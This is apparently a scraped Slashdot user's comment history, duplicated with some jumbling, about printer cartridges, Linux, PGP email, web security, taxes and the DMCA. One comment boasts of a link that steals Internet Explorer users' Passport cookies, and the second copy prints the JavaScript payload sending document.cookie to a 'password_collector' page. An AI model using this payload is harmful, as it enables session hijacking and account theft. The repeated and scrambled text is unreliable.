Indeed, your post makes sense exactly as you pointed out. However, boycotting a manufacturer after you've bought their product is hardly a statement. It's not like petrol[esso.com] or something, where you buy it every week.
Lexmark could care less if you buy a printer from their competitors. They've not lost any of their reputation. The printer market has not shrunk, and the opposition to their court case has been light enough that they've got away with illegally restricting trade in order to prevent their competitors from selling a product.
So no, a boycott is not difficult to understand. What I don't understand is the usefulness of an unorganised one-person silent boycott. Tell the people you know. Share the story at work. Publish it on your website and in your local newspaper. Lexmark aren't going to have their second-thoughts until the kind of people who populate PC-World go in there already knowing "Lexmark==Evil"
"Do you suppose that there will be a big, screaming banner on the box stating that for now and forever you will be raped by overpriced single-source refills?"
Well, it was pretty clear in most of the computer shops I've visited. You can hardly go and buy a printer without walking past the rows of £30 printer cartridges, all in bright colours, and with a different one for every printer ever invented.
Dammit, why can you not buy a black ink cartridge? Can you imagine if every printer took a different type of paper, and you had to replace all your paper when you went from an S300 to an S500? I've not upgraded my printer since I got it 5 years ago, and the way I see manufacturers behaving, I have no plans to.
Try explaining to your grandparents why the printer they just bought came with so little ink that it needs replacing after 30 pages.
"I told them that I was going to dump my Lexmark printer and buy one of their competitors' models."
Please explain how buying another printer hurts the printer industry?
When I heard about this, I told the four or five people I knew who were planning to buy printers. They didn't buy Lexmark, and I'm glad to have informed them.
"Will the US be targeting ancient batteries with their smart bombs?"
I try to avoid falling off my chair laughing at the thought. U.S. smart bombs. Hitting targets. Please stop!
Do you imagine that those TV pics (from TIALD) of bombs hitting the designated target were typical of all bombs dropped? Why do you think that you only ever saw one such video, from all the tens of thousands of bombs dropped?
Try it out if you want. We have a TIALD simulator in the office.
"The support overhead should be non-existant, as the school district IT staff should just set them all up as terminals, or can have images handy for quick ghosting (if needs be)"
What's with dumb terminals in schools? They're going to buy the latest flashiest computers anyway just to show them off at open-days, so why not take that as granted and say "by the way, we can save $800 per computer on licenses" and install KDE?
Linux in school doesn't have to mean command-lines and programming classes. If you're going to expose people to the world's second-best operating system, then why not show them around the rest of the OS too? Peoples' perception of linux shouldn't be "we telnet to it in programming class", it should be "it does everything Windows does, but better"
It's one which, if clicked by anyone using Internet Explorer, will send their Microsoft Passport cookies to a page on my site, which will allow me to log into any passport-protected site as them
p.s. I just copied the link-format from 2600; I've not investigated it much myself, as a Mozilla user.
"When it's called PGP it's good, when they call it Microsoft Something Something it's bad?"
Microsoft product's primary purpose is evil. PGP's primary purpose is good. PGP is used by individuals to protect their privacy. DRM is used by corporations to screw their customers.
"I always write plaintext emails - I guess I'm not enough of a geek to do GPG in my head."
That's probably about right in Windows (cut'n'paste to PGP is an ass, and you can't browse your email folders), but believe me, it becomes a lot easier when you get KMail running.
KMail will just ask you once for the passphrase, and then display encrypted email messages as normal - lovely. The only difficulty is that it can take some time to get GPG itself working, or to import keys. Anyone's welcome to email me to ask for help.
On Windows, the easiest way is to pay $30 for The Bat[ritalabs.com] which includes its own PGP implementation, or Enigmail[projects.mozdev.org] which works with Mozilla mail and GPG. Both of those systems are excellent email clients, with encryption just the icing on the cake.
Don't be tempted to use PGP plugin with Outlook or Express. It has the potential to crash the program, and leave you unable to even see the encrypted text.
Interestingly, the research notes that the email program tested was set to check all of its accounts every 5 minutes, thus scuppering any security that relies on timestamps. Somewhat offtopic, but certainly an interesting thing to note for people designing systems.
"This looks like a 'man in the middle' attack to me, not so much a failure of ssl."
Okay. I recently suffered a man-in-the-middle attack. I was faced with the choice of using insecure alternatives to communicate, or not being able to read email or update my website.
My family quite often have problems with secure email. It doesn't take a genius to work out that when their secure email fails, they turn it off and write plaintext emails.
MitM attacks are not to be sniffed at. With the clueless [or deadline-pressed] public, you can defeat encryption just by scrambling it.
"However, many websites currently use the "key under the doormat" approach to security"
Perhaps worse is that the public have been led to believe that "HTTPS" and a padlock icon mean that a website is secure.
I've chatted to plenty of ecommerce website operators, and they really are clueless. People who wouldn't know what a hash was if you slapped them with one. They buy a Verisign certificate, and that's the end of that. Post a big notice on the front page saying "your transactions are protected by unbreakable security"
People believe it.
Read 2600's credit-card ordering page for comparaison: We do not save your credit card information after your order is complete. We also do not share ANY of your information with anyone. If you've ordered a subscription, your name and address reside on our subscriber database which is located on a machine that is never connected to the net and which is protected by two levels of encryption that even the NSA would have trouble with. We will also NEVER send you unsolicited mail. In other words, we know a thing or two about privacy and we will do everything possible to protect yours.
If that's what a policy should look like, why do we even let amazon and yahoo get away with their "your credit card is secure with us" lies?
You have to calculate your own taxes? Wow, that really sucks. So where does all that IRS money go, if they're not even prepared to send you a tax bill?
People here are saying they spend thousands of dollars paying accountants, just to tell them how much tax to pay. And that's as well as the tax itself.
Why is it tolerated at all? If the IRS wants some money, they can damn well tell you what money they want and why.
After all, it's not as if they don't already know every detail of your payroll. Or (in the UK) authorised to read your email and employ private dicks to spy on people.
Because WinAmp3 sucks, as you'll discover the next time you have to wait 10 seconds for it to load, or have Windows crash when you try to change themes.
"If they're so worried the voting software is closed source, why not start an open source project?"
Because they don't need to. It already exists -- the need now is for people to make sure that the good systems get used.
It's no point writing the best software if people running the elections go out and buy a piece-of-shit proprietry system just because they know the people selling it, and it has a cool brochure.
"So, is a windows 2000 install disk now illegal under the DMCA as a circumvention device?"
Absolutely. You may laugh, you may moderate it funny, but if you can get this into court and sue microsoft for publishing a circumvention device [which protects copyrighted material on your windows partition], you have a great example with which to shoot down the DMCA.
Which leads to a question I've wondered about for a long time:
Why is the/home/ filesystem not by default encrypted with the users' passwords?
Admittedly this could be rather a processor-strain on servers with thousands of users, but for machines where you don't want people to be able to login to your account with a bootdisk, isn't this rather an oversight?
"It does this with my patented Mind Matrix Technology (TM) that uses a complex mathematical formula to determine what the user wants to see next."
I think this is planned for the Windows Palladium MSN-Internet Explorer TM browser. You'll just open the browser and it'll show you the sites it thinks you should visit.
If you can't wait till then, and want to try the beta test, download RealPlayer, and check the "I want to install the download manager" option.
Slashdot Mirror
Indeed, your post makes sense exactly as you pointed out. However, boycotting a manufacturer after you've bought their product is hardly a statement. It's not like petrol[esso.com] or something, where you buy it every week.
Lexmark could care less if you buy a printer from their competitors. They've not lost any of their reputation. The printer market has not shrunk, and the opposition to their court case has been light enough that they've got away with illegally restricting trade in order to prevent their competitors from selling a product.
So no, a boycott is not difficult to understand. What I don't understand is the usefulness of an unorganised one-person silent boycott. Tell the people you know. Share the story at work. Publish it on your website and in your local newspaper. Lexmark aren't going to have their second-thoughts until the kind of people who populate PC-World go in there already knowing "Lexmark==Evil"
"Do you suppose that there will be a big, screaming banner on the box stating that for now and forever you will be raped by overpriced single-source refills?"
Well, it was pretty clear in most of the computer shops I've visited. You can hardly go and buy a printer without walking past the rows of £30 printer cartridges, all in bright colours, and with a different one for every printer ever invented.
Dammit, why can you not buy a black ink cartridge? Can you imagine if every printer took a different type of paper, and you had to replace all your paper when you went from an S300 to an S500? I've not upgraded my printer since I got it 5 years ago, and the way I see manufacturers behaving, I have no plans to.
Try explaining to your grandparents why the printer they just bought came with so little ink that it needs replacing after 30 pages.
"I told them that I was going to dump my Lexmark printer and buy one of their competitors' models."
Please explain how buying another printer hurts the printer industry?
When I heard about this, I told the four or five people I knew who were planning to buy printers. They didn't buy Lexmark, and I'm glad to have informed them.
"We must stand by and permit the torture and murder of unknown tens of thousands of Iraqis by the Hussein regime"
As opposed to what?
As opposed to the murder of unknown tens of thousands of Iraqis by the Bush regime?
"Will the US be targeting ancient batteries with their smart bombs?"
I try to avoid falling off my chair laughing at the thought. U.S. smart bombs. Hitting targets. Please stop!
Do you imagine that those TV pics (from TIALD) of bombs hitting the designated target were typical of all bombs dropped? Why do you think that you only ever saw one such video, from all the tens of thousands of bombs dropped?
Try it out if you want. We have a TIALD simulator in the office.
"Saddam wasn't too concerned about artifacts...when he invaded Kuwait in 1990 and his soldiers ransacked the museums"
So should each country be responsible for the acts committed by its soldiers?
"i wonder did anyone bother submitting this idea to the Mozilla people instead of to slashdot ?"
Where do you think the mozilla hackers live?
"Any easy way to verify this yourself?"
At a guess, a packet sniffer. Try running update once, then installing a piece of non-MS software and running it again to see if anything's changed.
"The support overhead should be non-existant, as the school district IT staff should just set them all up as terminals, or can have images handy for quick ghosting (if needs be)"
What's with dumb terminals in schools? They're going to buy the latest flashiest computers anyway just to show them off at open-days, so why not take that as granted and say "by the way, we can save $800 per computer on licenses" and install KDE?
Linux in school doesn't have to mean command-lines and programming classes. If you're going to expose people to the world's second-best operating system, then why not show them around the rest of the OS too? Peoples' perception of linux shouldn't be "we telnet to it in programming class", it should be "it does everything Windows does, but better"
"The FCC allows unlicensed low-power FM broadcasts without a license"
Don't try this in the United Kingdom.
"what the hell kind of link is that?"
It's one which, if clicked by anyone using Internet Explorer, will send their Microsoft Passport cookies to a page on my site, which will allow me to log into any passport-protected site as them
p.s. I just copied the link-format from 2600; I've not investigated it much myself, as a Mozilla user.
"Microsoft is requiring users who want the IRM functionality to be running the super-secure Microsoft Passport"
about://passport.microsoft.com/ javascript:document.location = "mysite.org/password_collector?" + document.cookie;
"When it's called PGP it's good, when they call it Microsoft Something Something it's bad?"
Microsoft product's primary purpose is evil. PGP's primary purpose is good. PGP is used by individuals to protect their privacy. DRM is used by corporations to screw their customers.
"I always write plaintext emails - I guess I'm not enough of a geek to do GPG in my head."
That's probably about right in Windows (cut'n'paste to PGP is an ass, and you can't browse your email folders), but believe me, it becomes a lot easier when you get KMail running.
KMail will just ask you once for the passphrase, and then display encrypted email messages as normal - lovely. The only difficulty is that it can take some time to get GPG itself working, or to import keys. Anyone's welcome to email me to ask for help.
On Windows, the easiest way is to pay $30 for The Bat[ritalabs.com] which includes its own PGP implementation, or Enigmail[projects.mozdev.org] which works with Mozilla mail and GPG. Both of those systems are excellent email clients, with encryption just the icing on the cake.
Don't be tempted to use PGP plugin with Outlook or Express. It has the potential to crash the program, and leave you unable to even see the encrypted text.
Interestingly, the research notes that the email program tested was set to check all of its accounts every 5 minutes, thus scuppering any security that relies on timestamps. Somewhat offtopic, but certainly an interesting thing to note for people designing systems.
"This looks like a 'man in the middle' attack to me, not so much a failure of ssl."
Okay. I recently suffered a man-in-the-middle attack. I was faced with the choice of using insecure alternatives to communicate, or not being able to read email or update my website.
My family quite often have problems with secure email. It doesn't take a genius to work out that when their secure email fails, they turn it off and write plaintext emails.
MitM attacks are not to be sniffed at. With the clueless [or deadline-pressed] public, you can defeat encryption just by scrambling it.
"However, many websites currently use the "key under the doormat" approach to security"
Perhaps worse is that the public have been led to believe that "HTTPS" and a padlock icon mean that a website is secure.
I've chatted to plenty of ecommerce website operators, and they really are clueless. People who wouldn't know what a hash was if you slapped them with one. They buy a Verisign certificate, and that's the end of that. Post a big notice on the front page saying "your transactions are protected by unbreakable security"
People believe it.
Read 2600's credit-card ordering page for comparaison:
We do not save your credit card information after your order is complete. We also do not share ANY of your information with anyone. If you've ordered a subscription, your name and address reside on our subscriber database which is located on a machine that is never connected to the net and which is protected by two levels of encryption that even the NSA would have trouble with. We will also NEVER send you unsolicited mail. In other words, we know a thing or two about privacy and we will do everything possible to protect yours.
If that's what a policy should look like, why do we even let amazon and yahoo get away with their "your credit card is secure with us" lies?
"Want to make ... some of the most toxic substances known?"
Welcome to my fridge.
You have to calculate your own taxes? Wow, that really sucks. So where does all that IRS money go, if they're not even prepared to send you a tax bill?
People here are saying they spend thousands of dollars paying accountants, just to tell them how much tax to pay. And that's as well as the tax itself.
Why is it tolerated at all? If the IRS wants some money, they can damn well tell you what money they want and why.
After all, it's not as if they don't already know every detail of your payroll. Or (in the UK) authorised to read your email and employ private dicks to spy on people.
"Argh, why's there no support for Winamp 3?"
Because WinAmp3 sucks, as you'll discover the next time you have to wait 10 seconds for it to load, or have Windows crash when you try to change themes.
My keyboard has a penguin key between Ctrl and Meta -- it activates the KDE application menu, or the Gnome background menu.
"If they're so worried the voting software is closed source, why not start an open source project?"
Because they don't need to. It already exists -- the need now is for people to make sure that the good systems get used.
It's no point writing the best software if people running the elections go out and buy a piece-of-shit proprietry system just because they know the people selling it, and it has a cool brochure.
"So, is a windows 2000 install disk now illegal under the DMCA as a circumvention device?"
Absolutely. You may laugh, you may moderate it funny, but if you can get this into court and sue microsoft for publishing a circumvention device [which protects copyrighted material on your windows partition], you have a great example with which to shoot down the DMCA.
Which leads to a question I've wondered about for a long time:
/home/ filesystem not by default encrypted with the users' passwords?
Why is the
Admittedly this could be rather a processor-strain on servers with thousands of users, but for machines where you don't want people to be able to login to your account with a bootdisk, isn't this rather an oversight?
"It does this with my patented Mind Matrix Technology (TM) that uses a complex mathematical formula to determine what the user wants to see next."
I think this is planned for the Windows Palladium MSN-Internet Explorer TM browser. You'll just open the browser and it'll show you the sites it thinks you should visit.
If you can't wait till then, and want to try the beta test, download RealPlayer, and check the "I want to install the download manager" option.